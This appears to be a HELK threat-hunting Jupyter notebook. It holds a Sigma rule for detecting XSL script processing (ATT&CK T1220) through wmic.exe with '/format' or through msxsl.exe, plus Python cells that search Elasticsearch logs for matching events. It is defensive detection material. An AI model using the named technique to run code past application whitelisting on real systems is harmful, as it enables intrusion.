mirror of https://github.com/infosecn1nja/HELK.git
133 lines
3.4 KiB
Plaintext
133 lines
3.4 KiB
Plaintext
{
|
|
"cells": [
|
|
{
|
|
"cell_type": "markdown",
|
|
"metadata": {},
|
|
"source": [
|
|
"# XSL Script Processing\n",
|
|
"Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files, rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses"
|
|
]
|
|
},
|
|
{
|
|
"cell_type": "markdown",
|
|
"metadata": {},
|
|
"source": [
|
|
"## Rule Content\n",
|
|
"```\n",
|
|
"- title: XSL Script Processing\n",
|
|
" id: 05c36dd6-79d6-4a9a-97da-3db20298ab2d\n",
|
|
" status: experimental\n",
|
|
" description: Extensible Stylesheet Language (XSL) files are commonly used to describe\n",
|
|
" the processing and rendering of data within XML files, rule detects when adversaries\n",
|
|
" abuse this functionality to execute arbitrary files while potentially bypassing\n",
|
|
" application whitelisting defenses\n",
|
|
" author: Timur Zinniatullin, oscd.community\n",
|
|
" date: 2019/10/21\n",
|
|
" modified: 2019/11/04\n",
|
|
" references:\n",
|
|
" - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.yaml\n",
|
|
" logsource:\n",
|
|
" category: process_creation\n",
|
|
" product: windows\n",
|
|
" service: null\n",
|
|
" detection:\n",
|
|
" selection:\n",
|
|
" - Image|endswith: \\wmic.exe\n",
|
|
" CommandLine|contains: /format\n",
|
|
" - Image|endswith: \\msxsl.exe\n",
|
|
" condition: selection\n",
|
|
" falsepositives:\n",
|
|
" - WMIC.exe FP depend on scripts and administrative methods used in the monitored\n",
|
|
" environment\n",
|
|
" - msxsl.exe is not installed by default so unlikely.\n",
|
|
" level: medium\n",
|
|
" tags:\n",
|
|
" - attack.execution\n",
|
|
" - attack.t1220\n",
|
|
"\n",
|
|
"```"
|
|
]
|
|
},
|
|
{
|
|
"cell_type": "markdown",
|
|
"metadata": {},
|
|
"source": [
|
|
"## Querying Elasticsearch"
|
|
]
|
|
},
|
|
{
|
|
"cell_type": "markdown",
|
|
"metadata": {},
|
|
"source": [
|
|
"### Import Libraries"
|
|
]
|
|
},
|
|
{
|
|
"cell_type": "code",
|
|
"execution_count": null,
|
|
"metadata": {},
|
|
"outputs": [],
|
|
"source": [
|
|
"from elasticsearch import Elasticsearch\n",
|
|
"from elasticsearch_dsl import Search\n",
|
|
"import pandas as pd"
|
|
]
|
|
},
|
|
{
|
|
"cell_type": "markdown",
|
|
"metadata": {},
|
|
"source": [
|
|
"### Initialize Elasticsearch client"
|
|
]
|
|
},
|
|
{
|
|
"cell_type": "code",
|
|
"execution_count": null,
|
|
"metadata": {},
|
|
"outputs": [],
|
|
"source": [
|
|
"es = Elasticsearch(['http://helk-elasticsearch:9200'])\n",
|
|
"searchContext = Search(using=es, index='logs-*', doc_type='doc')"
|
|
]
|
|
},
|
|
{
|
|
"cell_type": "markdown",
|
|
"metadata": {},
|
|
"source": [
|
|
"### Run Elasticsearch Query"
|
|
]
|
|
},
|
|
{
|
|
"cell_type": "code",
|
|
"execution_count": null,
|
|
"metadata": {},
|
|
"outputs": [],
|
|
"source": [
|
|
"s = searchContext.query('query_string', query='((process_path.keyword:*\\\\wmic.exe AND process_command_line.keyword:*\\/format*) OR process_path.keyword:*\\\\msxsl.exe)')\n",
|
|
"response = s.execute()\n",
|
|
"if response.success():\n",
|
|
" df = pd.DataFrame((d.to_dict() for d in s.scan()))"
|
|
]
|
|
},
|
|
{
|
|
"cell_type": "markdown",
|
|
"metadata": {},
|
|
"source": [
|
|
"### Show Results"
|
|
]
|
|
},
|
|
{
|
|
"cell_type": "code",
|
|
"execution_count": null,
|
|
"metadata": {},
|
|
"outputs": [],
|
|
"source": [
|
|
"df.head()"
|
|
]
|
|
}
|
|
],
|
|
"metadata": {},
|
|
"nbformat": 4,
|
|
"nbformat_minor": 4
|
|
}
|